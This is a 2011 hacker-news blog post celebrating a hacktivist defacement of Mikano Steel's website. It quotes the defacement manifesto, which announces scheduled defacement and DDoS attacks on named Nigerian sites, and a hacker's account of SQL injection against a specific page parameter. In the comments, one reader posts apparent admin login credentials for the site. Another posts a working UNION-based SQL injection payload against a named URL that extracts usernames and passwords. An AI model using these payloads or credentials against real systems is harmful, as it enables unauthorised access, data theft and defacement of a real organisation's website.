Friday, June 24, 2011

Mikano Steel Web Site Hacked !

By Commander X

5:45 PM PT June 24, 2011

HackerLeaks has just been notified by an anonymous source that the Mikano Steel web site has been badly hacked. The site is located at -

http://www.mikanosteel.com/


The site was massively defaced, as the screen shots will show. HackerLeaks staff have verified that 30 minutes after the leak was received the site is still in the state shown in these photos. The defacement and attack are part of Operation Let There Be Light In Nigeria, a joint Op of Naija Cyber Hactivists, the Peoples Liberation Front - and Anonymous. According to our source, members of all three groups participated. Operation Let There Be Light In Nigeria according to the source of this disclosure is an Operation to bring badly needed affordable electrical energy to the Nigerian people. The site was also defaced with the following message:

" Hacked By The Naija Cyber Hactivists
This site was hacked using a tiger 1 kva generator with 5 littres of fuel ! no be so he suppose be :-(
#LetThereBeLightInNigeria
    NaijaCyberHactivists have officially Decided to identify with the Nigerian Million March project  facebook.com/event.php?eid=219476691418888 (Let there be light in Nigeria). The official #Hashtag would be #LetThereBeLightInNigeria
       Our aim is to identify both from the Cyber Space and the Fields with,collaboration with The PLF and Anonymous
        We are standing against Darkness !
        We are saying enough is enough !
        We are saying Let there be light in Nigeria !
        Young and Old ,
        Liberal , Progressives and Conservatives
        North, South,East and West
       Christians and Muslims.
        We can not sit at our systems, browsing facebook, tweeting while expecting a revolution.
        Every time we decide not to exercise our rights, We contribute to the oppresion of the human body
        and the repression of the human mind.
        You have a choice to make,... walk willingly  in into your own submission
        Or
        A choice to get up, walk the walk and say enough is enough -No more darkness in Nigeria!
        There is going to be a peaceful action named Nigerian Million March.
        The Nigerian Million March, is a PEACEFUL march with NO POLITICAL AGENDA and is NOT POLITICALLY AFFILIATED and not started by NaijaCyberHactivists.
     
        What is the purpose of the peaceful “Nigerian Million March”?
        To create a greater awareness that the lack of electricity denies Nigerians of their basic necessities of life such as: Employment, Security, Good Health, Education, Economic Growth and many more.
     
        For more info : http://www.facebook.com/event.php?eid=219476691418888
                        http://www.nigerianmillionmarch.com/
     
        This is a noble cause for our nation and we have decided to identify with this project.
        You will hear more from us -STAY TUNED!
   
       Naijacyberhactivists - In Source Code We Trust, Fighting for a cause.
       Our Mission : Hand Over The Whip To The Horse!
   
    http://twitter.com/#!/NaijaCyberHack
Naijacyberhactivists@yahoo.com
   
    We would be using defacement and ddos as a media to make the #LightUpNigeria movement known to the public
    The main targets would be http://www.phcnonline.com/  and http://www.mikano-intl.com/
   
    The Op #LetThereBeLightInNigeria would be going live on 24th June 2011 and subsequent attacks will follow suit
    as stated below :
   
    #LetThereBeLightInNigeria Attack 1 - June 24th
    #LetThereBeLightInNigeria Attack 2 - July 24th
    #LetThereBeLightInNigeria Attack 3 - August 24th
    #LetThereBeLightInNigeria Attack 4 - September 24th"


According to one of the sources of this leak, the hackers used the follwing technique to gain entry into the site: "okay i just used a sqli simple injection
used havij to dump it
then asked flip0ut to help me with the admin page
he got it and i entered it
when i got in there was a cms editor i was familiar with
so i just started working on it
i first i use havij to dunp this url http://www.mikanosteel.com/product-image. php?picid=6'"

The source for this disclosure also indicated that the database from this site was also stolen and is being forwarded to HackerLeaks. This is a breaking release and we will update this post as more info is sent to us.

2 comments:

  1. Admin: 1995m@kano
    Password: m@kano2011

    ReplyDelete
  2. To all the sKiddies: Please learn how to inject manually! Havij rocks, but you should also rock! ;)

    However, here's my POC for this Page, a more or less (more less than more) nice Formatting for the Password...

    @mikanosteel.com: you should be able to get that fixed soon, because another defacing would just be bad for PR...

    Here is the POC:

    http://www.mikanosteel.com/bigimage.php?prodid=0'UNION ALL SELECT 1,2,3,concat(0x223e3c2f74643e3c2f74723e3c2f7461626c653e3c2f6469763e3c646976207374796c653d22706f736974696f6e3a2066697865643b20746f703a203070783b206c6566743a3070783b2077696474683a2036303070783b206865696768743a31303070783b206261636b67726f756e642d636f6c6f723a20726762283235352c302c3029223e557365723a2020203c623e,username,0x3c2f623e3c62723e50617373776f72643a202020,password,0x3c62723e3c62723e3c62723e50726f6f66204f6620436f6e63657074206279203c623e6330707065723c2f623e3c2f6469763e3c696d67),4,5,6 FROM users WHERE '1'='1

    Best Regards from a white hat
    c0pper

    PS: Sorry for the unreadable HeX code, Blogspot doesn't allow < tD> codes... (stupid, isn't it? :P)

    ReplyDelete